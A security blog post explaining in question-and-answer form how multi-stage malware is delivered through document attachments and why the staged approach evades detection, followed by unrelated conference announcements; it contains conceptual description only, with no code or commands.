Welcome!

Cloud Security Authors: Rishi Bhargava, Pat Romanski, Jim Hansen, Shelly Palmer, Allwyn Sequeira

Related Topics: Cloud Security

Cloud Security: Blog Post

Malware Delivery – Understanding Multiple Stage Malware

How trusted file attachments has opened the vector for continued intrusions.

To some of us, seeing an email with malware embedded in a PDF, Word or Excel attachment is common. In fact, it has become the new norm for malware delivery to use file types that are not obviously malicious (versus something like a .exe). Gone are the days of wide-open acceptance of all file extensions for attachments within an email. In today's network defense-in-depth techniques, one of the layers is naturally email security. This includes the scrutinizing of emails for embedded links or attachments that could be potentially malicious, scanning attachments for possible detectable viruses and even inspecting the mail header for details that could point to the continued use of a particular "sender" address targeting an organization.

With the delivery of the malware always evolving to avoid being detected, why is it so common to see multi-stage malware? What exactly IS multi-stage malware, and why can it be more difficult to detect through common defense-in-depth strategies? I recently sat with a customer who ran these questions by me.  They were concerned that this might be some kind of new and sophisticated attack being used against their organization that their security team was not aware of. Truth is, this type of attack method is more common than you know, and has been going on for a significant period of time.

Let's start by tackling the easiest questions.

Question: What is multi-stage malware?

Answer: It is malware that is delivered in stages.  Seriously, that's it.

Question: So then what are the stages?

Answer: Ah, I was hoping that was your next question...

The typical stages for the delivery are as follows;

Stage 1: The main goal of the first stage is to simply get some kind of execution on a victim computer to retrieve the larger portion of the malware.  Utilizing a legitimate looking file (PDF, DOC, XLS) that is embedded with the stage 1 malware, the attacker can entice the target to open it, and allow execution. After execution, the first stage malware may also find some way to make itself persistent. What do I mean by persistent? Well let's say that as soon as you open an infected PDF, the stage 1 malware begins execution on your computer, but you happen to immediately shut down your computer.  If that malware did not create some kind of way to re-execute after you start your computer, it will not execute again until you open the infected PDF again. Attackers know that it's unlikely you will re-open the attachment, so they like to build in a way for the malware to re-execute after your computer starts up.  That way it is guaranteed to finish its initial job, which is to retrieve the next stage malware.

Stage2: This is where the more robust malware sections of the malware are introduced, potentially causing an unfettered amount of damage to its victim computer. Stage 2 typically gives the attacker an array of capabilities that are not available with stage 1, such as:

  • Victim computer screen capture
  • Start webcam
  • Graphical ability to browse victim computer file system
  • Stealing of files and software
  • Deletion of files
  • Elevation or escalation of privileges
  • Keylogging and potential destruction of the victim file system

Furthermore, Stage 2 malware may also provide the ability for the attacker to migrate to another computer on the same network which provides the ability for even more extensive damage by allowing the attacker to spread out and cause an increase in damage.

Question: Are those the only stages of delivery?

Answer: Not always, but this is the most common.  Sometimes "plugins" or "modules" are available to add to the malware, and they can be delivered or removed on an as needed basis.  The attacker wants to limit the amount of network traffic to a particular domain that is hosting malware as this could lead to detection and blocking, which would stop the potential for successful delivery of any future malware or even stage 2.

Question: Why stage the delivery at all?  Why not just embed all of the malware instead of a portion in the infected document or file?

Answer: There are a few reasons for staging the delivery, one of them being size. Simply put, if the size of the malware is large enough then embedding the whole thing into a PDF would make the file quite large; therefore, more suspicious.  Another reason is to limit the possibility of detection through various scanners and traffic inspectors. The first stage of the malware is quite light in what commands and system calls that it makes which helps to evade detection by signature or even heuristics. It is not uncommon at all to see a PDF reader software open a PDF, then immediately connect to the Internet. Most PDF readers routinely check for updates as soon as they are opened, and attackers know this to be true often enough.  So the stage 1 malware just hides within that behavior, reducing its ability to be detected. Lastly, development of custom malware is expensive and takes time, so losing the entire piece of malware due to detection of any sort can be a huge set back to the attackers. Even if the attackers are using commercial or open source attack tools, rebuilding them to avoid antivirus detection can be time consuming and costly. Losing the stage 1 malware through  detection is easier to address than burning the complete malware package. By staging the delivery it limits the potential loss to the attacker. There many other reasons to break the malware up and retrieve upon infection, but these are some of the most important ones.

Question: This is making more and more sense to me, but just quickly can you go over why it's much harder to detect?

Answer: The smaller and more embedded the malware is, the more difficult to detect, especially inside of a commonly used and trusted file. When the commands for the malware are simplified as well as the needs from a victim computer to execute, again, detection is difficult. When malware is overly complicated, or it has large consumption requirements from the operating system to correctly function, the chances for detection though defense-in-depth techniques is increased. Large, complicated malware is more likely to break and alert the user to its presence, or even get detected by antivirus. It is also most likely to fail Deep Packet Inspection at the IDS/IPS layer due to possible signatures for specific system calls the malware makes. Small, simple malware finds a home inside of the most common files and documents that we not only use and open every day, but also are typically allowable as an attachment in an email. Because the malware is small, it can be easily modified, making signature development almost impossible. Breaking the malware apart also changes which security tools are inspecting the malware. If stage 1 is delivered through an email, than you will have to get through an IDS/IPS, an Email AntiVirus product (if you are dealing with an enterprise), as well as any attachment inspection that occurs on the email gateway. Stage 2 is then delivered after successful infection of victim computer, typically after the victim computer asks a particular web server for the stage 2 malware. If this request is done over SSL/HTTPS, then there is a good chance there will be no inspection of the malware until it reaches the host.  At delivery, the malware has to contend with antivirus on the victim computer, which is trivial for a sophisticated attacker to either bypass or defeat.

Question: If it's so damn hard to detect, how on earth do I stop it?

Answer: Excellent question, this is something we can address in my next blog, "Better Host Based Protection, Logically".

More Stories By Cory Marchand

Cory Marchand is a trusted subject matter expert on topics of Cyber Security Threats, Network and Host based Assessment and Computer Forensics. Mr. Marchand has supported several customers over his 10+ years within the field of Computer Security including State, Federal and Military Government as well as the Private sector. Mr. Marchand holds several industry related certificates including CISSP, EnCE, GSEC, GCIA, GCIH, GREM, GSNA and CEH.

@ThingsExpo Stories
China Unicom exhibit at the 19th International Cloud Expo, which took place at the Santa Clara Convention Center in Santa Clara, CA, in November 2016. China United Network Communications Group Co. Ltd ("China Unicom") was officially established in 2009 on the basis of the merger of former China Netcom and former China Unicom. China Unicom mainly operates a full range of telecommunications services including mobile broadband (GSM, WCDMA, LTE FDD, TD-LTE), fixed-line broadband, ICT, data communica...
SYS-CON Events announced today that Ocean9will exhibit at SYS-CON's 20th International Cloud Expo®, which will take place on June 6-8, 2017, at the Javits Center in New York City, NY. Ocean9 provides cloud services for Backup, Disaster Recovery (DRaaS) and instant Innovation, and redefines enterprise infrastructure with its cloud native subscription offerings for mission critical SAP workloads.
Things are changing so quickly in IoT that it would take a wizard to predict which ecosystem will gain the most traction. In order for IoT to reach its potential, smart devices must be able to work together. Today, there are a slew of interoperability standards being promoted by big names to make this happen: HomeKit, Brillo and Alljoyn. In his session at @ThingsExpo, Adam Justice, vice president and general manager of Grid Connect, will review what happens when smart devices don’t work togethe...
SYS-CON Events announced today that SoftLayer, an IBM Company, has been named “Gold Sponsor” of SYS-CON's 18th Cloud Expo, which will take place on June 7-9, 2016, at the Javits Center in New York, New York. SoftLayer, an IBM Company, provides cloud infrastructure as a service from a growing number of data centers and network points of presence around the world. SoftLayer’s customers range from Web startups to global enterprises.
SYS-CON Events announced today that CA Technologies has been named “Platinum Sponsor” of SYS-CON's 20th International Cloud Expo®, which will take place on June 6-8, 2017, at the Javits Center in New York City, NY, and the 21st International Cloud Expo®, which will take place October 31-November 2, 2017, at the Santa Clara Convention Center in Santa Clara, CA. CA Technologies helps customers succeed in a future where every business – from apparel to energy – is being rewritten by software. From ...
SYS-CON Events announced today that Technologic Systems Inc., an embedded systems solutions company, will exhibit at SYS-CON's @ThingsExpo, which will take place on June 6-8, 2017, at the Javits Center in New York City, NY. Technologic Systems is an embedded systems company with headquarters in Fountain Hills, Arizona. They have been in business for 32 years, helping more than 8,000 OEM customers and building over a hundred COTS products that have never been discontinued. Technologic Systems’ pr...
SYS-CON Events announced today that Auditwerx will exhibit at SYS-CON's 20th International Cloud Expo®, which will take place on June 6-8, 2017, at the Javits Center in New York City, NY. Auditwerx specializes in SOC 1, SOC 2, and SOC 3 attestation services throughout the U.S. and Canada. As a division of Carr, Riggs & Ingram (CRI), one of the top 20 largest CPA firms nationally, you can expect the resources, skills, and experience of a much larger firm combined with the accessibility and attent...
SYS-CON Events announced today that HTBase will exhibit at SYS-CON's 20th International Cloud Expo®, which will take place on June 6-8, 2017, at the Javits Center in New York City, NY. HTBase (Gartner 2016 Cool Vendor) delivers a Composable IT infrastructure solution architected for agility and increased efficiency. It turns compute, storage, and fabric into fluid pools of resources that are easily composed and re-composed to meet each application’s needs. With HTBase, companies can quickly prov...
SYS-CON Events announced today that Loom Systems will exhibit at SYS-CON's 20th International Cloud Expo®, which will take place on June 6-8, 2017, at the Javits Center in New York City, NY. Founded in 2015, Loom Systems delivers an advanced AI solution to predict and prevent problems in the digital business. Loom stands alone in the industry as an AI analysis platform requiring no prior math knowledge from operators, leveraging the existing staff to succeed in the digital era. With offices in S...
Buzzword alert: Microservices and IoT at a DevOps conference? What could possibly go wrong? In this Power Panel at DevOps Summit, moderated by Jason Bloomberg, the leading expert on architecting agility for the enterprise and president of Intellyx, panelists peeled away the buzz and discuss the important architectural principles behind implementing IoT solutions for the enterprise. As remote IoT devices and sensors become increasingly intelligent, they become part of our distributed cloud enviro...
SYS-CON Events announced today that T-Mobile will exhibit at SYS-CON's 20th International Cloud Expo®, which will take place on June 6-8, 2017, at the Javits Center in New York City, NY. As America's Un-carrier, T-Mobile US, Inc., is redefining the way consumers and businesses buy wireless services through leading product and service innovation. The Company's advanced nationwide 4G LTE network delivers outstanding wireless experiences to 67.4 million customers who are unwilling to compromise on ...
SYS-CON Events announced today that Infranics will exhibit at SYS-CON's 20th International Cloud Expo®, which will take place on June 6-8, 2017, at the Javits Center in New York City, NY. Since 2000, Infranics has developed SysMaster Suite, which is required for the stable and efficient management of ICT infrastructure. The ICT management solution developed and provided by Infranics continues to add intelligence to the ICT infrastructure through the IMC (Infra Management Cycle) based on mathemat...
SYS-CON Events announced today that Interoute, owner-operator of one of Europe's largest networks and a global cloud services platform, has been named “Bronze Sponsor” of SYS-CON's 20th Cloud Expo, which will take place on June 6-8, 2017 at the Javits Center in New York, New York. Interoute is the owner-operator of one of Europe's largest networks and a global cloud services platform which encompasses 12 data centers, 14 virtual data centers and 31 colocation centers, with connections to 195 add...
SYS-CON Events announced today that Cloudistics, an on-premises cloud computing company, has been named “Bronze Sponsor” of SYS-CON's 20th International Cloud Expo®, which will take place on June 6-8, 2017, at the Javits Center in New York City, NY. Cloudistics delivers a complete public cloud experience with composable on-premises infrastructures to medium and large enterprises. Its software-defined technology natively converges network, storage, compute, virtualization, and management into a ...
In his session at @ThingsExpo, Eric Lachapelle, CEO of the Professional Evaluation and Certification Board (PECB), will provide an overview of various initiatives to certifiy the security of connected devices and future trends in ensuring public trust of IoT. Eric Lachapelle is the Chief Executive Officer of the Professional Evaluation and Certification Board (PECB), an international certification body. His role is to help companies and individuals to achieve professional, accredited and worldw...
In his General Session at 16th Cloud Expo, David Shacochis, host of The Hybrid IT Files podcast and Vice President at CenturyLink, investigated three key trends of the “gigabit economy" though the story of a Fortune 500 communications company in transformation. Narrating how multi-modal hybrid IT, service automation, and agile delivery all intersect, he will cover the role of storytelling and empathy in achieving strategic alignment between the enterprise and its information technology.
Microservices are a very exciting architectural approach that many organizations are looking to as a way to accelerate innovation. Microservices promise to allow teams to move away from monolithic "ball of mud" systems, but the reality is that, in the vast majority of organizations, different projects and technologies will continue to be developed at different speeds. How to handle the dependencies between these disparate systems with different iteration cycles? Consider the "canoncial problem" ...
The Internet of Things is clearly many things: data collection and analytics, wearables, Smart Grids and Smart Cities, the Industrial Internet, and more. Cool platforms like Arduino, Raspberry Pi, Intel's Galileo and Edison, and a diverse world of sensors are making the IoT a great toy box for developers in all these areas. In this Power Panel at @ThingsExpo, moderated by Conference Chair Roger Strukhoff, panelists discussed what things are the most important, which will have the most profound e...
Keeping pace with advancements in software delivery processes and tooling is taxing even for the most proficient organizations. Point tools, platforms, open source and the increasing adoption of private and public cloud services requires strong engineering rigor - all in the face of developer demands to use the tools of choice. As Agile has settled in as a mainstream practice, now DevOps has emerged as the next wave to improve software delivery speed and output. To make DevOps work, organization...
My team embarked on building a data lake for our sales and marketing data to better understand customer journeys. This required building a hybrid data pipeline to connect our cloud CRM with the new Hadoop Data Lake. One challenge is that IT was not in a position to provide support until we proved value and marketing did not have the experience, so we embarked on the journey ourselves within the product marketing team for our line of business within Progress. In his session at @BigDataExpo, Sum...